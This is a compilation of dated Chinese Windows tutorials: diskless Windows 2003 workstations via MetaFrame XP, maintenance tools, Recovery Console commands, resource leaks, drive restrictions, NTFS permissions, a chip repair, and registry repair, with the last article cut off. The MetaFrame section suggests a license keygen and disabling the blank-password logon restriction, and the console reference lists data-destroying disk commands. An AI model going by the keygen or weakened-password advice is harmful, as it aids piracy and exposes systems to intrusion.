    MetaFrame XP是一个采用ICA协议的一个终端服务软件，它与MSWin2003的终端服务比较主要特点是客户端的软件提供丰富，有DOS下和Win32下的客户端程序。所以是一个非常优秀的软件， 将MetaFrame XP文件解压，进入解压目录，运行Autorun.exe用超级用户进行安装。安装过程中一般情况选下一步就可以了。因为MetaFrame XP只有最新的版本才能在Windows 2003上面安装，所以，只有光盘中的MetaFrame XP才是最新的版本，其它的是安装不上的！不用过多的设置，重启动后MetaFrame XP就安好了。你会发现桌面上会多一个叫MetaFrame XP的工具栏。

    默认状态有8个按纽，一般我们只对最后一个按纽设置就够了。其它创建工作站安装磁盘，打印设置，资源调度，帮助等不要多余的设置。安装MetaFrame XP再重启动，重启动后会显示计算机的协议没有安装，不要紧，我们可以用注册机算码。记要进行该项设置，选MetaFrame工具栏上的最后一个按纽，点击,然后就会打开提示您输入用户名，我们只需要确定就行了，等一会儿，就会进入MetaFrame XP的控制台！我们会看到很多的项目，我们只需要选择licensec,然后在右边将我们需要添加的号加入就行了！具体的可以看多媒体的演示！添加好后退出就行了。其它设置，我建设用MS的终端服务配置进行设置因为那毕竟是中文的。

    MetaFrame XP就安装好后，因为MetaFrame XP有DOS下的客户端，所以这是DOS下能不能连接2003的关键程序！

    装好后在D:新建一个目录,取名为DOS,共享出来,(用右键设置) 然后进入光盘的2003目录，将ICADOS32拷入共享的DOS目录。 需要注意的几点：

1、在本地安全策略中需要将安全选项的本地安全设置（使用空白密码的本地怅户只能在控制台登陆）需要禁用，不然，工作站就需要设置密码！
    2、在用户权限分配中需要将通过终端服务允许登陆，这里要添加USER组，不然，工作站将不能进入2003！
    3、在终端服务配置中的ICA-TCP协议，其中的权限选项中，需要添加USER组，否则我们创建的用户就不能登陆2003界面！

    工作站安装：

    DOS下登陆Windows2003

    在服务器上面事先将ICADOS32目录共享，我们可以使用MetaFrame 1.8的客户端,将它操作拷入DOS共享目录。（其实我光盘中有WF文件，将WF文件解压后，拷入DOS共享目录，也就是上面建立的D：\dos目录，这样在工作站启动时就会在F：下有WF目录，只要运行批处理2就行了，当然服务器名要设为SERVER，不然只有参照下面自已安装。）工作站启动后，会出现C盘：用命令NET USE F： \\SERVER\DOS将服务器的共享目录，进入ICADOS32目录运行INSTALL.EXE。首先，进入icados32目录（这是dos32位客户端的目录），运行install，按f1同意协议，进行安装。默认的是c:\wfclient目录，我们就安装到F：\WF，直接回车。事先找一个MOUSE程序拷入WF。文件复制完毕，提示运行wfclient.exe进行配置，我们直接键入wfclient刚开始会提示输入computer name，我们随便输入一个。我输入d，然后出现需不需要马上配置一个连接的提示，选择YES。

    我们还可以用entry菜单的properties……来进行配置。上面是配置菜单，只需要配置两个就可以运作了。options是各种配置的菜单。关键的是第一个,就是preferences。那是关于图象的设置。其它就不要设置了.返回,回车就会进入Windows2003了.最后将AUTOEXEC.BAT 和CONFIG.SYS两个文件改变一下就能自动进入了.当然要加MOUSE.可以建一个批处理:例如:MOUSE.EXE

    此处关键就是要选择VSLTCP/IP协议,其它的协议无效!

    三，完成安装

    全部安装完成后，我们要注意，将RPL目录和DOS共享目录备份到安全的地方，今后如果工作站不能启动，只需要覆盖一下就可以了，另外，强力推荐，将D：的分区用GHOST做一个镜像，保护起来，这样就算出了什么问题，也可以正常还原到安装状态！

    现在重新启动工作站，过一会儿Win2003就启动了。进入速度很快，完全和硬盘没两样。

    Windows2003无盘技术非常适合于学校和办公，和一些不玩游戏的网吧。成本相比传统的硬盘Win98，Win2003网络来说要低得多，并且有安装简便，维持简单的特点。


系统的维护

《一键清理系统垃圾》

系统的维护

    大家都知道，Windows是一个比较脆弱的系统，系统崩溃的现象时有发生。采取一定的措施，使系统保持在良好的运行状态，就是笔者在下面要介绍的内容。
    一、使用Windows自带的维护工具
    Windows自身提供了简单而实用的系统维护工具。在新近面世的Windows 2000中，这方面已经做得很好了。而目前使用最广泛的Windows 98，它还比较脆弱，系统自身对文件的保护功能不是很完善，但系统还是提供了一些维护工具，如^39020201d^表所示。这些程序大部分可以在“附件”里面找到，而使用也比较简单，这里就不多说了。利用这些工具维护系统，有以下几点经验：
    1.学会设置控制面板中的各个项目
    在控制面板中包括了许多设置项目，其中有系统的各种硬件设置、输入/输出环境设置、应用程序及系统组件安装及卸载、硬件设备的添加和卸载、用户管理、系统字库、系统运行配置设置、系统管理设置、互联网访问及其控制设置等，可以说这是普通用户与系统底层内核接触的桥梁。
    2.熟悉自己机器的硬件配置
    比如各个主要部件的品牌、所使用的芯片型号、总线速度及特点、各种支持的驱动程序等，都应该有大致的了解。此外，最好把各种设备驱动程序盘分门别类保存好，以备日后系统错误时恢复。
    3.定期备份系统注册表
    Windows的注册表保存了系统启动及运行所需的所有设置，如果注册表受损，系统将出错甚至无法启动。而且随着不断地安装与删除程序，Windows的注册表会越来越庞大，这样一来系统的运行速度也会降低。
    注册表的备份实际上非常简单。在Windows的安装路径下，有两个隐含属性的文件“System.dat”和“User.dat”，将它们复制到一个安全的地方就可以了。恢复时只要将备份的文件重新复制到Windows路径下，覆盖同名的文件即可。
    4.做好文件备份工作
    这些文件包括系统收藏夹、ICQ用户列表、邮件、地址簿、重要文件等等，一旦丢失，几乎没有恢复的可能。备份收藏夹和邮件、地址簿，软件本身就提供这样的功能。文件备份建议选择一个好用的备份工具，如SecondCopy 2000，并设置以计划任务方式运行。
    5.定期扫描磁盘与优化磁盘
    扫描磁盘和整理磁盘碎片可以说是需要最经常进行的操作，也是最基本、最常用的磁盘维护操作。运行附件中的磁盘扫描程序和磁盘碎片整理程序，选择需要整理的磁盘驱动器，之后确定即可。
    6.清理磁盘中无用的文件
    除了删除安装的各种无用的文件外，使用Windows自带的磁盘清理程序可以快速有效地清除硬盘各个路径下的无用文件。运行磁盘清理程序，在关联的对话框中选择需要清理的驱动器。确定后程序开始扫描，之后给出扫描结果，根据自己需要选择删除对象，之后单击“确定”按钮即可。
    7.使用“系统还原”功能快速恢复系统设置
    在最新的Windows Me附件中，提供了一个非常好用的系统维护工具——系统还原。使用这个工具可以取消对计算机的有害更改并还原设置。此外，Windows Me提供的系统还原是可逆操作，你可以恢复任何用系统还原对系统所做的修改。在Windows Me安装到系统之后，程序会自动创建相应的还原点（称之为系统检查点），用户也可以根据自己的使用状况创建自己的还原点。这样一来在系统出现问题时就可以使用还原点对系统进行彻底恢复。
    8.其他
    日常的使用也必须注意，这实际上是可以保证系统安全、平稳运行的最主要维护方式。如果你的机器存在不明的兼容性问题，可试试通过升级设备驱动程序，甚至升级主板或显卡的BIOS来解决。
    二、使用专门工具维护系统
    除了Windows提供的系统维护工具外，各个软件公司也相继推出了基于系统维护的工具，他们通常提供了比操作系统更多、功能更强大的系统维护工具（否则怎么会有人买呢，呵呵）。其中有商业软件、共享软件和免费软件。当然最好用的还是商业软件，如Norton System Work 2000。共享软件一般功能比较单一，但也不乏功能强大者，如专门针对系统注册表维护的WinRescue 2000、专门清除系统垃圾文件的SafeClean Utilities 3.0、Windows缓存管理工具O＆O CleverCache等。
    1.使用Norton System Work 2000维护系统
    http:∥www.symantec.com
    就系统维护而言，Norton System Work 2000无疑是最好的（注：2001版已经有了，但功能变化不大）。该工具包括了PC系统维护工具Norton Utilities、Windows维护工具Norton CleanSweep、防止系统崩溃工具Norton CrashGuard、系统病毒防护工具Norton AntiVirus、硬盘克隆工具Ghost、网络服务工具Norton Web Services等。
    在以上工具中，Norton Utilities无疑是目前最优秀的PC系统维护工具，它提供的功能包括：系统诊断、检测并修复系统潜在的各种错误、优化系统、增强系统性能、对系统性能提供测试、维护系统的正常运行等等，可以说目前在Windows环境下可能遇到的各种问题该工具都提供了解决的方案。这个工具的另一个特点是使用起来相当的方便，全部采用Wizard的操作方式，即使你是一个初学者，也可以轻易完成所有的操作。安全性方面考虑得也很周到，如果你觉得程序的扫描效果不好，可以轻松将系统恢复到修复之前的样子。
    Norton Utilities分为四大部分（如^39020201a^1所示），其中包括：
    ●Find and Fix Problems（查找和修复问题）：其中提供了“Norton System Check”系统环境错误检测、“Norton WinDoctor”Windows注册表错误检测、“Norton Disk Doctor”磁盘错误检测、“UnErase Wizard”恢复删除的文件等四个项目。
    ●Improve Preformance（提高性能）：其中提供了“SpeedDisk”系统磁盘碎片整理、“Norton Optimization Wizard”Windows及其应用程序优化向导等两个项目。
    ●Preventive Maintenance（保护性维护）：其中提供了“Norton System Doctor”在线Windows系统监测、“Norton WipeInfo”彻底删除文件、“Image”磁盘镜像、“Norton Registry Tracker”Windows注册表跟踪器等四个项目。
    ●Troubleshoot（故障）：其中提供了“Norton Diagnostics”系统硬件诊断、“System Information”系统信息统计、“Norton Registry Editor”Windows注册表编辑器、“Norton File Compare”文件比较工具等四个项目。
    由于程序提供的工具众多，加上篇幅所限，在此就不作具体说明了。
#1　　2.使用环保卫士定期清理磁盘
    http:∥www.ministars.com
    环保卫士（SafeClean Utilities）是一个非常著名的共享软件（如^39020201b^2所示），主要功能是扫描系统各个路径下存在的各种无用文件，同时还可以清除系统中无效的快捷方式、Internet访问所生成的各种临时文件和Cookie。此外，该工具还提供了一个磁盘信息统计工具，可以很好地协助你了解硬盘的文件分配情况。
    3.使用WinRescue维护系统注册表与系统配置
    http:∥superwin.com/rescuent.htm
    WinRescue是一个非常好的Windows备份工具，如^39020201c^3。它提供的功能非常全面，其中包括Windows系统启动文件备份与恢复、系统崩溃修复、制作系统引导盘、制作Windows NT/2000启动盘等功能。该工具的使用方法同样非常简单，程序提供Wizard方式操作，而且功能划分也很直观，你可以方便地选择相应的功能。对于备份项目，程序提供了使用默认设置以及用户自定义备份项目功能，提供完整恢复备份项目以及从备份文件中提取单个文件功能。
    4.使用O＆O CleverCache辅助管理Windows缓存
    http:∥www.oo－software.com/
    该工具以驻留方式运行，不需要用户干预。如果需要设置程序的运行环境，可以从系统控制面板中启动相应的程序，其中提供了使用Windows管理Cache以及由O＆O CleverCache管理系统缓存功能，你可以自由选择。当添加了新的设置后，程序会要求你重新引导系统。O＆O CleverCache提供了基于Windows、Windows 2000以及Server等版本的相应程序，你可根据自己的系统选择。

作者：张熙平


Windows XP 控制台命令详解

《一键清理系统垃圾》

Windows XP 控制台命令详解

- 系统和磁盘操作命令

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Bootcfg

    bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。

    含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。

    用法：

    bootcfg /default　　设置默认引导项。

    bootcfg /add　　　　向引导列表中添加 Windows 安装。

    bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。

    注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。

    bootcfg /scan　　　 扫描用于 Windows 安装的所有磁盘并显示结果。

    注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。

    bootcfg /list　　　列出引导列表中已有的条目。

    bootcfg /disableredirect 在启动引导程序中禁用重定向。

    bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]

    在启动引导程序中通过指定配置启用重定向。

    范例：

bootcfg /redirect com1 115200
bootcfg /redirect useBiosSettings

    hkdsk

    创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。

    含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。

    vol [drive:] [ chkdsk [drive:] [/p] [/r]

    参数　　无

    如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。

drive: 指定要 chkdsk 检查的驱动器。
/p　　 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。
/r　　 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。

    注意

Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为 \%systemroot%\System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。
    Diskpart

    创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。

    diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]

    参数 无

    如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。

    /add

    创建新的分区。

    /delete

    删除现有分区。

    device_name

    要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：

    \Device\HardDisk0

    drive_name

    以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：

    D:

    partition_name

    以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例：

    \Device\HardDisk0\Partition1

     大小

    要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。

    范例

    下例将删除分区：

diskpart /delete \ Device\ HardDisk0\ Partition3
diskpart /delete F:

    下例将在硬盘上添加一个 20 MB 的分区：

    diskpart /add \ Device\ HardDisk0 20

    Fixboot

    向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用 fixboot 命令。

    fixboot [drive]

    参数　　驱动器

    将要写入引导扇区的驱动器。它将替代默认的驱动器（即用户登录的系统分区）。例如，驱动器：D:

    范例

    下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区：

    fixboot d:

    注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。

    Fixmbr

    修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。

    fixmbr [ device_name]

    参数

    device_name

    要写入新的主引导记录的设备（驱动器）。设备名称可从 map 命令的输出获得。例如，设备名称：

    \Device\HardDisk0

    范例

    下列命令示例向指定设备写入一个新的主引导记录：

    fixmbr \Device\HardDisk0

    注意

如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。
如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。
    Format

    将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。

    format [ drive:] [ /fs:file-system]

    参数

    drive:

    指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。

    /q

    对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化过的驱动器使用该参数。

    /fs:file-system

    指定要使用的文件系统：FAT、FAT32 或 NTFS 。如果未指定文件系统，将使用现有的文件系统格式。

    Map

    显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。

    map 命令仅在使用故障恢复控制台时才可用。

    Map [ arc]

    参数

    arc

    指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例：

    multi(0)disk(0)rdisk(0)partition(1)

    等价的设备名称是：

    \Device\HardDisk0\Partition1

    范例

    下例将物理设备名映射为使用 ARC 设备名称的驱动器号：

    map arc

    注意

如果不使用 arc 参数，则 map 命令显示设备名称。
map 命令还显示文件系统的类型和每个磁盘的大小（MB）。
← 返回


系统资源泄漏的问题和对策

《一键清理系统垃圾》

系统资源泄漏的问题和对策

有人说，如果使用Windows98，那么在使用了3个小时以后，最好能重新启动一次，因为它太累了。事实上确实如此，但并不是因为它太累了，而是因为系统资源的泄漏。

    一、系统资源

    谈到Windows时，有一个必说的话题--系统资源（System Resource），但系统资源到底是什么，有人说是指CPU，有人说是指硬盘空间，有人说是指内存……

    当应用程序在Windows中运行时，Windows必须实时"跟踪"该应用程序的运行，并保留与之相关的许多信息，如按钮、光标、菜单的位置和位图、窗口的状况等，这些信息由Windows保留在一种叫堆的内存块中，堆的英文为Heap。简单地说，堆是采用特殊机制管理的内存块。由Windows的一个系统内核User.exe管理的堆叫作User资源堆（User Resource Heap），由另一个系统内核Gdi.exe管理的堆叫作GDI资源堆（Graphical Device Interface Resource Heap，简称GDI Resource Heap），User资源堆和GDI资源堆合称为系统资源堆（System Resource Heap），习惯上就把它们叫作系统资源（System Resource）。

    微软将Windows的系统资源（堆）分为五个堆，其中User资源堆为三个，而GDI资源堆为两个。

    三个User资源堆分别是：16位的用户堆（User Heap，64KB）；32位的窗口堆（Windows Heap，2MB）；32位的用户菜单堆（User Menu Heap，2MB）。

    两个GDI资源堆分别是：16位的GDI堆（GDI Heap，64KB）；32位的GDI堆（GDI，2MB）。

    从这里的系统资源分类和大小我们应该明白，不管CPU是P4还是486，内存是8M还是1G，所有Windows的用户都拥有同样大小的系统资源（堆），用户不能自己增加或减少系统资源的大小，这是由操作系统决定的，与硬件档次没有任何关系。

    Windows的User资源堆和GDI资源堆的可用（Free）空间称为可用 User资源和可用GDI资源，Windows中以百分数表示它们，用户可以选择 "开始/附件/系统工具/资源状况"（见图），来实时查看它们的大小。注意，"资源状况"不是Windows的默认安装组件，使用典型安装的用户需自己添加上去。

    二、为什么可用系统资源不断减少

    当一个应用程序在Windows中被加载时，Windows自动地将可用User资源堆和可用GDI资源堆中的一部分空间分配给它，而当应用程序退出时，这部分空间也应该由Windows收回以交给别的应用程序使用。但实际上几乎所有的Windows 用户都发现:一个应用程序加载前和退出后可用系统资源的值是不相等的，而且随着应用程序的不断加载和退出，随着Windows使用时间的增加，附图中资源状况显示的可用系统资源也在不断减少。

    微软的正式解释是:

    * 系统初始化

    Windows在启动时要进行系统初始化（System Initialization）的过程， Windows的系统初始化属于延时初始化。例如，Windows在启动时只初始化当前使用的字体，以后当应用程序要使用到尚未被初始化的字体时， Windows才会初始化该字体，这种由应用程序根据需要提出要求而发生的初始化服务就是所谓的延时初始化。对于属于延时初始化的服务， Windows还采用了特别的管理方式，当向Windows提出延时初始化服务的应用程序退出后，与延时初始化服务相关的系统资源（例如上面提到的与新字体有关的系统资源）不会随着应用程序的退出而马上释放，这是造成应用程序加载前和退出后可用系统资源的值不相等的原因之一。Windows不马上收回与延时初始化服务，是为了防止该应用程序或别的应用程序以后又向系统提出同样的初始化服务而导致系统不断重复服务而浪费时间。例如对于加载同一应用程序，第二次加载的时间会明显少于第一次，显然延时初始化功不可没。

    * 兼容性

    在Windows中运行的所有16位应用 程序共享相同的地址空间，当其中某一个16位应用程序正常退出或出现错误而被关闭时， Windows 9X并不马上收回这个应用程序所占用的系统资源，这也是造成一个应用程序加载前和退出后可用系统资源的值不相等的又一个原因。只有当所有的16位应用程序全部退出后，Windows才能安全地收回被这些程序占用的系统资源，此时可用系统资源才会恢复到原值。之所以这样设计，主要是考虑到要让Windows 9X能继续运行大量的16位应用程序。

    * 资源泄漏

    按上述解释，可用系统资源的不断减少是正常的，这是 Windows的设计目的之一。但是许多程序员在实际工作中还发现在其他一些情况下Windows也会不能完全收回系统资源，这也导致可用系统资源不断减少，程序员们称这种现象为资源泄漏（Resource Leak）。微软开始并未承认，但是随着证据的不断增加，最后还是不得不承认其中的一些现象是存在的。

    比如一个程序还未完成其加载过程时（即还没有启动完毕）就关闭它会造成资源泄漏，而且只有重新启动才能回收。

    另外一些应用程序退出后Windows并不马上收回分配给它的系统资源，而是保持15分钟左右，到Windows完全肯定不再需要时才将它们收回，这可以看作是延时初始化的一种延伸。

    用户使用"Ctrl+Alt+Del"强制性地关闭一些应用程序会造成资源泄漏，因此用户应该尽量使用应用程序本身的关闭功能退出应用程序，只有实在没办法时才使用这种关闭方法。因为这种强制关闭应用程序的方法往往只能关闭主程序，而不能关闭应用程序的一些子程序，因此会导致一些系统资源发生泄漏。

    一些编写不善的应用程序会造成资源泄漏。一个应用程序在运行中往往会因出现意外而崩溃，若程序员在编写应用程序时没有考虑到这种意外情况的出现，并在应用程序中有相应的代码处理这种意外，那么当该应用程序非正常关闭后，该应用程序所占用的系统资源就不能由Windows收回。

    还有一些应用程序，即使是正常关闭也不会释放它所占用的系统资源，这样的应用程序被程序员称为"垃圾"，计算机用户绝对不要使用这样的软件。

    还有一些实际存在而微软也没有给予解释的情况。比如用户上网结束后关闭拨号网络中的网络连接，然后按Ctrl+Alt+Del看看，一定会发现有一个名为rnaap（英文版）或者rnaapp（中文版）的程序还在运行，这是什么东西？其实这是拨号网络用来拨通ISP的远程网络访问程序（Remote Network Access Application Program），在用户登录网络的时候这个程序被运行，但是在用户从网络注销后它本身并未退出。这不免让人产生这样一个疑问：在这样一个庞大的Windows系统中，到底还有多少这样那样的例外存在呢？

    三、系统资源泄漏的对策

    关于系统资源泄漏的问题还有许多，由于篇幅所限，笔者只好省略掉对它们的详细分析和解释，而直接给出如何解系统的秘密决的结论。

    1.准确地来讲，Windows中并不存在一个有着实际意义的系统资源。可用系统资源一定等于可用User资源和可用GDI资源中值较小的那一个。

    2.Windows的可用User资源是根据所有User资源堆中可用空间最小的那个资源堆计算出来的；可用GDI资源的计算方法也是一样。为了保持与16位应用程序的兼容性， Windows 9X的大量数据都要使用16位64KB资源堆，这导致总是16位64KB的资源堆首先被大量消耗，因此在 Windows 9X中，限制系统资源使用的是64KB的资源堆而不是2MB的资源堆。

    3.系统资源是用来跟踪应用程序的运行而不是用来运行应用程序的，就像公路上车多车少，并不是车稍微多点就没有办法开车了。因此可以肯定地说，影响计算机系统性能的是计算机系统其他的因素，而绝不会是可用系统资源的大小。当用户计算机系统性能明显降低时，应该从别的方面去查找原因，而不要马上怀疑到系统资源身上。从硬件方面来看，内存太小导致系统不得不频繁使用虚拟内存是影响系统性能的主要原因之一；从软件方面来看，因为Windows是一个多任务的操作系统，大家都习惯同时运行多个应用程序而不管当时是否实际需要。而编写和调试这些应用程序的程序员一般只考虑其在单任务环境下的运行，而没有过多的精力从多任务环境来考虑和调试，因此许多应用程序间往往不能很好地协同工作，同时运行多个这样的应用程序会因它们彼此之间发生冲突而导致系统性能下降。当然，Windows 9X多任务管理机制的不完善也是造成这个问题的主要原因之一。

    4.虽然可用系统资源的减少不会对系统的性能有任何影响，但是其值最好不要小于10%，小于此值带来的直接后果是可能不能再加载新的应用程序，而副作用是系统崩溃的可能性大大增加。

    5.Windows本身也要占用系统资源，因此绝对没有哪个Windows用户的可用系统资源会是百分之百，要保持有更多的可用系统资源的方法是不要同时运行太多的应用程序。Windows和它的许多应用程序都有一个不经用户同意就自动加载东西的坏毛病，大家可以运行Msconfig.exe来关闭一些没有必要自动加载的应用程序，如ICQ、电子词典和超级解霸的自动播放伺服器等。

    6.不要将系统资源和CPU资源（CPU使用率）相混淆，硬盘、光驱、软猫的数据处理、显卡的3D图像处理、声卡的3D音效处理占用的都是CPU时间（即消耗CPU资源），而不是系统资源，这些硬件设备的先进与否与占用系统资源的多少根本没有任何关系，可至今许多人还是将它们混为一谈。按习惯，谈到硬件的资源占用一般是指其CPU资源的占用，而软件的资源占用既包括CPU资源占用又包括系统资源（堆）占用，但计算机用户关心的一般是后者，因此谈到软件的资源占用时一般是指其对系统资源的占用。

    最后说明一点，本文所提到的与系统资源有关的各种问题只适用于Windows 3.X、Windows 9X和Windows Me，而不适用于Windows NT、Windows 2000和Windows XP，因为它们设计和管理系统资源的机制是不同的。


限制驱动器的使用

《一键清理系统垃圾》

限制驱动器的使用

    如果我们不想让别人使用我们的驱动器，如系统盘C盘，光驱等，可以进行如下操作：

    1.在开始菜单的“运行”对话框中，输入“gpedit.msc”，打开“组策略”设置窗口。

    2.在“组策略”设置窗口中，依次打开 “本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”选项。

    3.在右边的设置窗口中，选择“防止从‘我的电脑’访问驱动器”项，在这个选项单击鼠标右键，选择“属性”，接着出现“防止从‘我的电脑’访问驱动器的属性”设置窗口。在其中有三个选项，分别是“未配置”、“已启用”、“已禁用”

    4.我们选择“已启用”后，在下面就会出现选择驱动器的下沉列表，如果希望限制某个驱动器的使用，只要选中该驱动器就可以了。比如，我们要限制C盘的使用，选中“仅限制驱动器C”，就可以了。如果希望关闭所有的驱动器，包括光驱等，可以选中“限制所有驱动器”。

    设置完毕以后，当再打开驱动器时，就会弹出禁止打开驱动器的提示框(图2)。即便是使用DIR命令、运行对话框和镜像网络驱动器对话框，也无法查看驱动器的目录。


详解Windows操作系统帐户权限设置

《一键清理系统垃圾》

详解Windows操作系统帐户权限设置

    随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用，WEBSHELL让防火墙形同虚设，一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实，只要你弄明白了NTFS系统下的权限设置问题，我们可以对crackers们说:NO!

    要打造一台安全的WEB服务器，那么这台服务器就一定要使用NTFS和Windows NT/2000/2003。众所周知，Windows是一个支持多用户、多任务的操作系统，这是权限设置的基础，一切权限设置都是基于用户和进程而言的，不同的用户在访问这台计算机时，将会有不同的权限。

    DOS跟WinNT的权限的分别

    DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗?不能!当我们打开一台装有DOS操作系统的计算机的时候，我们就拥有了这个操作系统的管理员权限，而且，这个权限无处不在。所以，我们只能说DOS不支持权限的设置，不能说它没有权限。随着人们安全意识的提高，权限设置随着NTFS的发布诞生了。

    Windows NT里，用户被分成许多组，组和组之间都有不同的权限，当然，一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。

    Administrators,管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以，只有受信任的人员才可成为该组的成员。

    Power Users，高级用户组，Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中，这个组的权限是仅次于Administrators的。

    Users:普通用户组，这个组的用户无法进行有意或无意的改动。因此，用户可以运行经过验证的应用程序，但不可以运行大多数旧版应用程序。Users 组是最安全的组，因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上，默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站，但不能关闭服务器。Users 可以创建本地组，但只能修改自己创建的本地组。

    Guests:来宾组，按默认值，来宾跟普通Users的成员有同等访问权，但来宾帐户的限制更多。


芯片级维修手记

《一键清理系统垃圾》

芯片级维修手记

以前听说芯片级维修很神秘，总以为要高手才能完成。但最近，我也对芯片级维修进行了尝试，原来如此，并非高深莫测。

前一段时间，公司数台电脑遭雷击，其中一台电脑能启动，但鼠标、Modem、软驱不能用，不管在DOS下还是在Win98下都一样，当连上Modem时，总是出现打开端口错误。我打开机箱一看，发现是SOYO(梅捷)5TE I430FX主板。在主板的前面，靠近COM插针旁的两块芯片中，有一块被打出了一个大洞。经过万用表的测量和详细观察，原来这两块芯片(GD75232)的引脚，一边是连到COM1和COM2口上的插针，另一边则是连到控制芯片(UMC UM8669BF)的。当时以为没办法修理，只好报废。最近，经朋友介绍，去了几次电子旧货市场，一日偶得一块旧主板I430 VX(花去2元钱)，看到主板上的COM控制芯片GD75232是好的，于是，突发奇想，是不是把它的GD75232芯片换到我原来损坏的主板上就可以了呢？我找出原主板，注意到GD75232芯片是双列直插式引脚，共20只，每边10只。若要将它焊下，则要用到电子技术上常用的焊集成块的方法──堆焊，就是先把锡放在各引脚上，把各引脚连起来，这样，当烙铁在一处加热时，其它的每个引脚也被加热，然后，用刀片将该集成块轻轻地撬起。此处须特别注意的是，不要弄乱或弄断主板上电路间的连线。此外，因主板一般有7层电路，不要用烙铁在一处加热得太久了，最好找一位有电子设备维修经验的技术人员在旁指

导；焊好后，打开电脑试机，鼠标、Modem、软驱还是不能用。再经观察和测试，发现软驱的连线是直接连到控制芯片UMC UM8669BF上的，由此可以推断UMC UM8669BF一定是被高电压所损坏了。然后，我用旧主板上的UMC UM8669BF替换它，再开机一试，OK，Win98居然找到新硬件了，仔细一看，原来是软驱控制器、COM1、COM2。鼠标也能用了，装好Modem，猫也飞奔似地跑，主板真的恢复到了以前的样子了。

经过我的观察，从486到奔腾机，主板上的COM控制芯片基本上都是GD75232或GD75232D芯片，当把它们取下来时，下面电路板上写的是GD75232，也就是说这两种芯片的作用是一样的，具体的区别我还没有发现；还有就是控制芯片UMC 8669BF，它是控制COM口、软驱等工作的，但有一些主板上用的是UMC 8663BF，经过试验，UMC 8669BF与UMC 8663BF可以直接代换；但在进行芯片代换时，必须注意它们的引脚是否相同，否则就不要进行下一步。

在进行芯片维修时因具有一定的危险性，必须要胆大心细，而且，特别是对芯片进行焊接的时候，由于引脚较多，电路较复杂，必须要有一定的电子维修经验。


修复注册表两法

《一键清理系统垃圾》

修复注册表两法

    在系统无法正常启动的时候，我们通常想到的是修复注册表。关于注册表的最常用方法就是使用“scanreg／restore”命令，但有的时候我们可能还需要另外的方法。这里我们介绍一下利用system.dat和system.lst文件来修复注册表的方法。这两个文件通常是存放在
    一、让Windows 98自动修复注册表
    1．在启动计算机进行完自检之后，按下F8键，在启动菜单中选择“Safe mode command prompt only”进入安全模式下。
    2．执行如下的DOS命令：
    cd\windows（进入Windows 98的安装目录）
    attrib －s －h －r system.dat（去掉system.dat文件的系统、隐藏、只读属性）
    ren system.dat system.bf （将system.dat文件改名备份）
    3．重新启动Windows 98系统，会出现启动菜单，选择以Normal方式启动，系统会提示注册表已经损坏，并自动进行修复。（注：系统在启动时如果没有发现system.dat文件，会自动用以前成功启动时备份的注册表数据来修复system.dat）
    4．重新启动计算机，Windows便能够正常启动。
    二、利用硬盘根目录下的system.dat修复注册表
